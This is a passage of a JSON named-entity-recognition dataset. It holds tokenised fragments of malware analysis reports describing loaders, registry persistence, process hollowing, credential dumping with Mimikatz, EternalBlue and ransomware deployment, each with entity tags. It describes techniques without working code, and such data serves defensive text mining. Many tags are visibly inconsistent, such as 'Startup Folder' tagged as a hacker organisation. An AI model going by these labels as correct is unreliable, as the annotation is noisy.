"and", - "another", - "contained", - "a", - "file", - "named", - "privatecopy.pdf." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "When", - "someone", - "tries", - "to", - "double-click", - "these", - "decoy", - "files,", - "Windows", - "(or", - "the", - "application", - "mapped", - "to", - "the", - "relevant", - "filetype)", - "throws", - "an", - "error", - "because", - "the", - "file", - "isn’t", - "the", - "type", - "of", - "file", - "it", - "appears", - "to", - "be" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "target", - "would", - "then,", - "naturally,", - "double", - "click", - "the", - "other", - "file", - "in", - "the", - "Zip", - "archive" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "command", - "pulls", - "down", - "a", - "Visual", - "Basic", - "script,", - "drops", - "it", - "into", - "the", - "C:\\Windows\\Tasks", - "folder,", - "and", - "executes", - "it." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "90", - "other", - "encrypted" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "heavily", - "obfuscated", - "VBS" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "initial", - "infector", - "is", - "a", - "Visual", - "Basic", - "script,", - "heavily", - "obfuscated" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "block", - "of", - "base64-encoded,", - "encrypted", - "data", - "comprises", - "almost", - "150KB", - "of", - "that", - "script," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "segments", - "of", - "base64", - "data" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "along", - "with", - "code", - "that", - "decodes", - "and", - "decrypts", - "the", - "block", - "of", - "base64." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "When", - "decoded,", - "the", - "content", - "of", - "the", - "Ir8", - "variable", - "(a", - "segment", - "of", - "which", - "is", - "shown", - "below)", - "turns", - "out", - "to", - "be", - "just", - "another", - "encoded", - "PowerShell", - "script,", - "which", - "the", - "VBS", - "decodes", - "and", - "then", - "executes." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "PowerShell", - "script", - "decoded", - "from", - "the", - "Ir8", - "variable", - "uses", - "Reflection." - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "performs", - "a", - "BXOR", - "to", - "decode", - "the", - "bytes" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "for", - "the", - "Ir8", - "script", - "to", - "decode." - ], - "ner_tags": [ - "O", - "O", - "B-Idus", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "These", - "work", - "in", - "tandem", - "to", - "insert", - "data", - "into", - "the", - "Windows", - "Registry" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "concatenated", - "segments", - "of", - "base64", - "data", - "from", - "O7", - "get", - "inserted", - "into", - "the", - "Registry," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "load", - "the", - "final", - "payload", - "into", - "memory", - "from", - "a", - "Registry", - "value", - "without" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "It", - "created", - "a", - "Run", - "key", - "in", - "the", - "Registry" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "And", - "that", - "Run", - "key", - "references", - "a", - "different", - "Registry", - "key" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "On", - "one", - "machine,", - "we", - "found", - "that", - "the", - "malware", - "injected", - "itself,", - "using", - "process", - "hollowing,", - "into", - "ielowutil.exe" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "obfuscated", - "with", - "legitimate", - "resources" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "encrypted", - "stack", - "strings" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Embedded", - "Resource" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "shellcode", - "from", - "the", - ".data", - "section" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "shellcode", - "that", - "was", - "stored", - "in", - "the", - ".data", - "section", - "is", - "now", - "stored", - "in", - "the", - ".rsc", - "section" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "advapi32.CryptHashData" - ], - "ner_tags": [ - "B-SamFile" - ] - }, - { - "tokens": [ - "will", - "create", - "a", - "key", - "using", - "advapi32.CryptDeriveKey" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "advapi32.CryptEncrypt" - ], - "ner_tags": [ - "B-SamFile" - ] - }, - { - "tokens": [ - "kernel32.LoadLibraryA,", - "kernel32.GetProcAddress,", - "kernel32.VirtualAlloc,", - "kernel32.VirtualProtect", - "and", - "ntdll.ZwFlushInstructionCache" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "kernel32.VirtualALloc" - ], - "ner_tags": [ - "B-SamFile" - ] - }, - { - "tokens": [ - "kernel32.VirtualProtect," - ], - "ner_tags": [ - "B-SamFile" - ] - }, - { - "tokens": [ - "kernel32.GetLastError" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "kernel32.CreateMutexA" - ], - "ner_tags": [ - "B-SamFile" - ] - }, - { - "tokens": [ - "wininet.HttpSendRequestA," - ], - "ner_tags": [ - "B-SamFile" - ] - }, - { - "tokens": [ - "shellcode", - "injection" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "copy", - "each", - "PE", - "section", - "one", - "at", - "a", - "time" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "creating", - "another", - "PE", - "in", - "memory," - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "injecting", - "a", - "PE", - "executable" - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "handle", - "to", - "the", - "current", - "process", - "for", - "the", - "purpose", - "of", - "allocating", - "memory", - "with", - "PAGE_EXECUTE_READWRITE", - "permissions" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "decrypt", - "the", - "shellcode" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decyrpt", - "its", - "C2", - "configuration" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "get", - "a", - "pointer", - "to", - "the", - "encrypted", - "shellcode", - "and", - "to", - "decrypt", - "it", - "have", - "been", - "broken", - "out", - "into", - "their", - "own", - "separate", - "functions" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "will", - "need", - "to", - "resolve", - "these", - "APIs", - "dynamically", - "to", - "interact", - "with", - "the", - "Windows", - "operating", - "system" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "resolving", - "many", - "different", - "Windows", - "APIs", - "using", - "kernel32.GetProcAddress" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "enumerating", - "the", - "Process", - "Environment", - "Block", - "(PEB)" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HTTP", - "HEAD", - "request" - ], - "ner_tags": [ - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "check", - "if", - "it", - "is", - "connected", - "to", - "the", - "internet", - "by", - "making", - "a", - "request" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "will", - "make", - "a", - "HTTP", - "GET", - "request" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "will", - "make", - "a", - "POST", - "request" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NBTScan", - "for", - "network", - "reconnaissance" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "System", - "Network", - "Connections", - "Discovery" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PsExec", - "for", - "lateral", - "movement" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "obtained", - "credentials", - "for", - "pivoting", - "with", - "Mimikatz" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "detect", - "memory", - "dumps", - "of", - "the", - "lsass", - "process" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OS", - "Credential", - "Dumping:", - "LSASS", - "Memory" - ], - "ner_tags": [ - "O", - "B-SecTeam", - "B-SecTeam", - "O", - "O" - ] - }, - { - "tokens": [ - "had", - "been", - "archived" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "encrypted", - "copy" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "encrypting", - "the", - "base", - "encryption", - "key", - "with", - "RSA", - "(with", - "a", - "hard-coded", - "1024-byte", - "public", - "key)", - "and", - "encoding", - "it", - "in", - "Base64." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "uploaded." - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "Exfiltration", - "Over", - "C2", - "Channel" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "run", - "bruteforcing", - "offline." - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "scan", - "hosts", - "for", - "so-called", - "Eternal*", - "SMB", - "vulnerabilities", - "with", - "SMBTouch", - "and", - "then,", - "where", - "possible,", - "run", - "the", - "EternalBlue", - "exploit", - "and", - "infect", - "the", - "computer" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Features", - "B-Features", - "B-Exp", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-Exp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Exploitation", - "of", - "Remote", - "Services" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SysUpdate", - "and", - "HyperBro", - "backdoors", - "were", - "installed" - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "push", - "Polar", - "ransomware", - "to", - "computers", - "and", - "run", - "it," - ], - "ner_tags": [ - "B-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Three", - "files", - "are", - "sent", - "to", - "the", - "victim's", - "computer:" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "obtained", - "the", - "credentials", - "of", - "a", - "domain", - "administration", - "at", - "headquarters" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "account", - "of", - "the", - "compromised", - "domain", - "admin" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Valid", - "Accounts:", - "Domain", - "Accounts" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "is", - "a", - ".NET", - "DLL", - "library", - "(compiled", - "on", - "April", - "29,", - "2020)", - "imported", - "when", - "GDFInstall.exe", - "is", - "run" - ], - "ner_tags": [ - "O", - "O", - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "XOR", - "decrypted", - "with", - "key", - "ABCSCDFRWFFSDJJHGYUOIj." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "decoded", - "with", - "Base64" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decrypts", - "a", - "third", - "component" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decrypted", - "and", - "decoded", - "version" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Deobfuscate/Decode", - "Files", - "or", - "Information" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "payload", - "and", - "intermediate", - "library", - "are", - "deleted", - "before", - "completion" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "deletes", - "the", - "intermediate", - "DLL", - "library", - "and", - "encrypted", - "ransomware" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "del" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "del" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "yielding", - "a", - "PE", - "file", - "that", - "is", - "loaded", - "and", - "run", - "in", - "memory", - "with", - ".NET." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "wmic" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "Windows", - "Management", - "Instrumentation" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "wmic" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "cmd.exe", - "Command", - "and", - "Scripting", - "Interpreter:", - "Windows", - "Command", - "Shell", - "looks", - "for", - "list", - "of", - "connected", - "disks", - "and", - "starts", - "recursive", - "traversal", - "of", - "directories", - "sends", - "an", - "HTTP", - "POST", - "request", - "with", - "the", - "name", - "of", - "the", - "victim's", - "computer", - "to", - "a", - "server", - "T1071" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Application", - "Layer", - "Protocol:", - "Web", - "Protocols\"" - ], - "ner_tags": [ - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SCHTASKS", - "/Create" - ], - "ner_tags": [ - "B-Way", - "B-Way" - ] - }, - { - "tokens": [ - "schtasks", - "/run" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "Scheduled", - "Task/Job:", - "Scheduled", - "Task" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Scheduled", - "Task/Job:", - "Scheduled", - "Task" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Exploit", - "Public-Facing", - "Application" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Boot", - "or", - "Logon", - "Autostart", - "Execution:", - "Registry", - "Run", - "Keys", - "/", - "Startup", - "Folder" - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "B-Tool", - "O", - "B-Way", - "B-HackOrg" - ] - }, - { - "tokens": [ - "Valid", - "Accounts:", - "Default", - "Accounts" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Exploitation", - "for", - "Privilege", - "Escalation" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "System", - "Information", - "Discovery" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lateral", - "Tool", - "Transfer" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Data", - "from", - "Local", - "System" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Encrypted", - "Channel:", - "Symmetric", - "Cryptography" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Unpacked", - "file", - "names" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "obfuscation", - "of", - "the", - "GuLoader", - "shellcode", - "and", - "payloads" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "download", - "additional", - "malicious", - "files" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "subsequently", - "download", - "Remcos", - "on", - "the", - "target", - "system" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - ":taking", - "full", - "control", - "of", - "the", - "infected", - "machinerecording", - "keystrokes", - "in", - "real", - "time", - "with" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "second", - "shellcode", - "revealed", - "after", - "the", - "unpacking", - "algorithm", - "finished", - "processing" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "this", - "executable", - "is", - "an", - "archive", - "that", - "can", - "be", - "unpacked", - "with", - "the", - "help", - "of", - "7zip" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Once", - "we", - "unpack", - "the", - "file,", - "we", - "can", - "see", - "several", - "elements,", - "as", - "well", - "as", - "directories", - "typical", - "for", - "NSIS:" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "It", - "is", - "unpacked" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "packer", - "has", - "been", - "around", - "for", - "many", - "years" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Then", - "the", - "functions", - "are", - "used", - "to", - "load", - "and", - "decrypt", - "the", - "payload." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "The", - "decryption", - "function", - "is", - "custom" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "custom", - "decryption", - "algorithm", - "is", - "being", - "applied", - "on", - "the", - "buffer" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "algorithm", - "used", - "for", - "the", - "buffer", - "decryption", - "differs", - "across", - "the", - "samples." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "shellcode", - "is", - "used", - "for", - "decrypting" - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "the", - "key", - "that", - "will", - "be", - "used", - "for", - "the", - "decryption", - "is", - "prepared." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "After", - "the", - "PE", - "is", - "decrypted" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "we", - "can", - "see", - "decryption", - "of", - "the", - "next", - "stage", - "with", - "the", - "help", - "of", - "a", - "custom", - "algorithm" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "It", - "contains", - "a", - "very", - "similar", - "function", - "dedicated", - "to", - "decrypting", - "and", - "loading", - "the", - "final", - "payload" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features" - ] - }, - { - "tokens": [ - "Both", - "of", - "them", - "are", - "encrypted," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "loading", - "the", - "final", - "payload", - "(PE", - "file)", - "from", - "the", - "third", - "of", - "the", - "encrypted", - "files." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "authors", - "used", - "several", - "common", - "techniques", - "to", - "obfuscate", - "this", - "process." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "passing", - "the", - "path", - "to", - "the", - "encrypted", - "component", - "as", - "a", - "parameter." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "obfuscating", - "malicious", - "elements." - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "As", - "before,", - "they", - "are", - "resolved", - "by", - "their", - "hashes." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Then,", - "a", - "function", - "defined", - "by", - "its", - "hash", - "is", - "retrieved", - "(using", - "the", - "same", - "hashing", - "algorithm", - "that", - "was", - "used", - "to", - "retrieve", - "imports", - "from", - "normally", - "loaded", - "DLLs):" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "By", - "extracting", - "the", - "syscalls,", - "and", - "executing", - "them", - "manually,", - "the", - "malware", - "can", - "use", - "the", - "API", - "of", - "the", - "operating", - "system,", - "without", - "a", - "need", - "of", - "calling", - "functions", - "from", - "the", - "DLL." - ], - "ner_tags": [ - "O", - "B-Features", - "I-Features", - "B-HackOrg", - "O", - "B-Features", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "functions", - "has", - "been", - "resolved", - "by", - "their", - "hashes." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "hashing", - "function", - "used", - "for", - "import", - "resolving" - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "By", - "extracting", - "the", - "syscalls,", - "and", - "executing", - "them", - "manually,", - "the", - "malware", - "can", - "use", - "the", - "API", - "of", - "the", - "operating", - "system," - ], - "ner_tags": [ - "O", - "B-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "using", - "low", - "level", - "APIs:", - "NtCreateSection,", - "NtMapViewOfSection" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "Functions", - "are", - "always", - "the", - "same", - "–", - "dedicated", - "to", - "reading", - "the", - "file", - "from", - "the", - "disk:", - "CreateFileW,", - "GetTempPathW,", - "lstrcatW,", - "ReadFile,", - "VirtualAlloc,", - "GetTempPathW." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "The", - "function", - "GetTempPathW", - "is", - "used" - ], - "ner_tags": [ - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "low-level", - "functions,", - "directly", - "related", - "with", - "performing", - "the", - "injection,", - "are", - "called", - "via", - "raw", - "syscalls" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "PE", - "injection" - ], - "ner_tags": [ - "B-Tool", - "I-Way" - ] - }, - { - "tokens": [ - "The", - "payload", - "is", - "implanted", - "into", - "a", - "newly", - "created", - "suspended", - "process", - "(a", - "new", - "instance", - "of", - "the", - "current", - "executable)", - "using", - "one", - "of", - "the", - "most", - "popular", - "techniques", - "of", - "PE", - "injection:", - "Process", - "Hollowing" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "a", - "second,", - "encrypted", - "component,", - "which", - "carries", - "the", - "payload." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "a", - "check", - "against", - "blacklisted", - "processes." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "exploiting", - "vulnerabilities", - "in", - "the", - "remote", - "desktop", - "protocol", - "(RDP)." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "distributing", - "phishing", - "emails", - "containing", - "malicious", - "files" - ], - "ner_tags": [ - "O", - "B-Way", - "I-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "it", - "attempts", - "to", - "establish", - "a", - "connection", - "with", - "the", - "remote", - "server", - "to", - "retrieve", - "the", - "subsequent", - "component", - "of", - "the", - "attack" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "malicious", - "template", - "file", - "is", - "downloaded", - "and", - "executed" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "trigger", - "the", - "retrieval", - "of", - "the", - "final", - "stage", - "payload" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "enables", - "the", - "document", - "to", - "fetch", - "the", - ".dotm", - "file", - "from", - "the", - "remote", - "server", - "required", - 